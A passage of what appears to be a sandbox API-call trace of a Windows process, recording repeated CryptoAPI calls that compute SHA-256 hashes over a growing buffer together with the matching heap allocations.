	[0193.896] CryptHashData (hHash=0x22b6940, pbData=0x2753bd8, dwDataLen=0x20, dwFlags=0x0) returned 1
	[0193.896] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0193.896] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2309c08
	[0193.896] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x2309c08, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2309c08, pdwDataLen=0x1283b0) returned 1
	[0193.896] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0193.896] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0193.896] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0193.897] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0193.897] CryptHashData (hHash=0x22b6900, pbData=0x2753bd8, dwDataLen=0x40, dwFlags=0x0) returned 1
	[0193.897] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0193.897] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2309c30
	[0193.897] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x2, pbData=0x2309c30, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2309c30, pdwDataLen=0x1283b0) returned 1
	[0193.897] CryptDestroyHash (hHash=0x22b6900) returned 1
	[0193.897] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0193.897] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0193.897] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0193.897] CryptHashData (hHash=0x22b6940, pbData=0x2753bd8, dwDataLen=0x60, dwFlags=0x0) returned 1
	[0193.897] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0193.897] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2309c58
	[0193.897] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x2309c58, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2309c58, pdwDataLen=0x1283b0) returned 1
	[0193.897] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0193.897] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0193.897] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0193.898] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0193.898] CryptHashData (hHash=0x22b6900, pbData=0x2753bd8, dwDataLen=0x80, dwFlags=0x0) returned 1
	[0193.898] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0193.898] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2309c80
	[0193.898] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x2, pbData=0x2309c80, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2309c80, pdwDataLen=0x1283b0) returned 1
	[0193.898] CryptDestroyHash (hHash=0x22b6900) returned 1
	[0193.898] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0193.898] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0193.898] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0193.898] CryptHashData (hHash=0x22b6940, pbData=0x2753bd8, dwDataLen=0xa0, dwFlags=0x0) returned 1
	[0193.898] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0193.898] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2309ca8
	[0193.898] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x2309ca8, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2309ca8, pdwDataLen=0x1283b0) returned 1
	[0193.898] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0193.898] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0193.898] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0193.899] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0193.899] CryptHashData (hHash=0x22b6900, pbData=0x2753bd8, dwDataLen=0xc0, dwFlags=0x0) returned 1
	[0193.899] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0193.899] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2309cd0
	[0193.899] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x2, pbData=0x2309cd0, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2309cd0, pdwDataLen=0x1283b0) returned 1
	[0193.899] CryptDestroyHash (hHash=0x22b6900) returned 1
	[0193.899] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0193.899] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0193.899] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0193.899] CryptHashData (hHash=0x22b6940, pbData=0x2753bd8, dwDataLen=0xe0, dwFlags=0x0) returned 1
	[0193.899] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0193.899] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2309cf8
	[0193.899] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x2309cf8, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2309cf8, pdwDataLen=0x1283b0) returned 1
	[0193.899] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0193.899] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0193.899] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0193.900] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0193.900] CryptHashData (hHash=0x22b6900, pbData=0x2753bd8, dwDataLen=0x100, dwFlags=0x0) returned 1
	[0193.900] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0193.900] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2309d20
	[0193.900] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x2, pbData=0x2309d20, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2309d20, pdwDataLen=0x1283b0) returned 1
	[0193.900] CryptDestroyHash (hHash=0x22b6900) returned 1
	[0193.900] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0193.900] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0193.900] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0193.900] CryptHashData (hHash=0x22b6940, pbData=0x2753bd8, dwDataLen=0x120, dwFlags=0x0) returned 1
	[0193.900] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0193.900] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2309d48
	[0193.900] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x2309d48, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2309d48, pdwDataLen=0x1283b0) returned 1
	[0193.900] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0193.900] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0193.900] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0193.901] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0193.901] CryptHashData (hHash=0x22b6900, pbData=0x2753bd8, dwDataLen=0x140, dwFlags=0x0) returned 1
	[0193.901] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0193.901] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2309d70
	[0193.901] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x2, pbData=0x2309d70, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2309d70, pdwDataLen=0x1283b0) returned 1
	[0193.901] CryptDestroyHash (hHash=0x22b6900) returned 1
	[0193.901] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0193.901] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0193.901] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0193.901] CryptHashData (hHash=0x22b6940, pbData=0x2753bd8, dwDataLen=0x160, dwFlags=0x0) returned 1
	[0193.901] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0193.901] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2309d98
	[0193.901] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x2309d98, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2309d98, pdwDataLen=0x1283b0) returned 1
	[0193.901] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0193.901] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0193.901] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0193.902] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0193.902] CryptHashData (hHash=0x22b6900, pbData=0x2753bd8, dwDataLen=0x180, dwFlags=0x0) returned 1
	[0193.902] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0193.902] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2309dc0
	[0193.902] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x2, pbData=0x2309dc0, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2309dc0, pdwDataLen=0x1283b0) returned 1
	[0193.902] CryptDestroyHash (hHash=0x22b6900) returned 1
	[0193.902] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0193.902] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0193.902] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0193.902] CryptHashData (hHash=0x22b6940, pbData=0x2753bd8, dwDataLen=0x1a0, dwFlags=0x0) returned 1
	[0193.902] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0193.902] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2309de8
	[0193.902] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x2309de8, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2309de8, pdwDataLen=0x1283b0) returned 1
	[0193.902] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0193.902] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0193.902] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0193.903] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0193.903] CryptHashData (hHash=0x22b6900, pbData=0x2753bd8, dwDataLen=0x1c0, dwFlags=0x0) returned 1
	[0193.903] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0193.903] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2309e10
	[0193.903] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x2, pbData=0x2309e10, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2309e10, pdwDataLen=0x1283b0) returned 1
	[0193.903] CryptDestroyHash (hHash=0x22b6900) returned 1
	[0193.903] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0193.903] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0193.903] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0193.903] CryptHashData (hHash=0x22b6940, pbData=0x2753bd8, dwDataLen=0x1e0, dwFlags=0x0) returned 1
	[0193.903] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0193.903] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2309e38
	[0193.903] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x2309e38, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2309e38, pdwDataLen=0x1283b0) returned 1
	[0193.903] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0193.903] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0193.903] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0193.903] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0193.904] CryptHashData (hHash=0x22b6900, pbData=0x2753bd8, dwDataLen=0x200, dwFlags=0x0) returned 1
	[0193.904] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0193.904] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2309e60
	[0193.904] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x2, pbData=0x2309e60, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2309e60, pdwDataLen=0x1283b0) returned 1
	[0193.904] CryptDestroyHash (hHash=0x22b6900) returned 1
	[0193.904] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0193.904] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0193.904] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0193.904] CryptHashData (hHash=0x22b6940, pbData=0x2753bd8, dwDataLen=0x220, dwFlags=0x0) returned 1
	[0193.904] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0193.904] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2309e88
	[0193.904] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x2309e88, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2309e88, pdwDataLen=0x1283b0) returned 1
	[0193.904] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0193.904] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0193.904] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0193.904] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0193.904] CryptHashData (hHash=0x22b6900, pbData=0x2753bd8, dwDataLen=0x240, dwFlags=0x0) returned 1
	[0193.905] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0193.905] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2309eb0
	[0193.905] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x2, pbData=0x2309eb0, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2309eb0, pdwDataLen=0x1283b0) returned 1
	[0193.905] CryptDestroyHash (hHash=0x22b6900) returned 1
	[0193.905] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0193.905] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0193.905] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0193.905] CryptHashData (hHash=0x22b6940, pbData=0x2753bd8, dwDataLen=0x260, dwFlags=0x0) returned 1
	[0193.905] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0193.905] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2309ed8
	[0193.905] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x2309ed8, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2309ed8, pdwDataLen=0x1283b0) returned 1
	[0193.905] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0193.905] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0193.905] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0193.905] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0193.905] CryptHashData (hHash=0x22b6900, pbData=0x2753bd8, dwDataLen=0x280, dwFlags=0x0) returned 1
	[0193.905] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0193.905] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2309f00
	[0193.906] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x2, pbData=0x2309f00, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2309f00, pdwDataLen=0x1283b0) returned 1
	[0193.906] CryptDestroyHash (hHash=0x22b6900) returned 1
	[0193.906] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0193.906] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0193.906] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0193.906] CryptHashData (hHash=0x22b6940, pbData=0x2753bd8, dwDataLen=0x2a0, dwFlags=0x0) returned 1
	[0193.906] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0193.906] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2309f28
	[0193.906] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x2309f28, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2309f28, pdwDataLen=0x1283b0) returned 1
	[0193.906] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0193.906] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0193.906] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0193.906] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0193.906] CryptHashData (hHash=0x22b6900, pbData=0x2753bd8, dwDataLen=0x2c0, dwFlags=0x0) returned 1
	[0193.906] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0193.906] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2309f50
	[0193.906] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x2, pbData=0x2309f50, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2309f50, pdwDataLen=0x1283b0) returned 1
	[0193.906] CryptDestroyHash (hHash=0x22b6900) returned 1
	[0193.907] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0193.907] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0193.907] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0193.907] CryptHashData (hHash=0x22b6940, pbData=0x2753bd8, dwDataLen=0x2e0, dwFlags=0x0) returned 1
	[0193.907] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0193.907] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2309f78
	[0193.907] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x2309f78, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2309f78, pdwDataLen=0x1283b0) returned 1
	[0193.907] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0193.907] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0193.907] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0193.907] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0193.907] CryptHashData (hHash=0x22b6900, pbData=0x2753bd8, dwDataLen=0x300, dwFlags=0x0) returned 1
	[0193.907] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0193.907] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2309fa0
	[0193.907] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x2, pbData=0x2309fa0, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2309fa0, pdwDataLen=0x1283b0) returned 1
	[0193.907] CryptDestroyHash (hHash=0x22b6900) returned 1
	[0193.907] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0193.908] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0193.908] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0193.908] CryptHashData (hHash=0x22b6940, pbData=0x2753bd8, dwDataLen=0x320, dwFlags=0x0) returned 1
	[0193.908] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0193.908] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2309fc8
	[0193.908] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x2309fc8, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2309fc8, pdwDataLen=0x1283b0) returned 1
	[0193.908] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0193.908] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0193.908] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0193.909] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0193.910] CryptHashData (hHash=0x22b6900, pbData=0x2753bd8, dwDataLen=0x340, dwFlags=0x0) returned 1
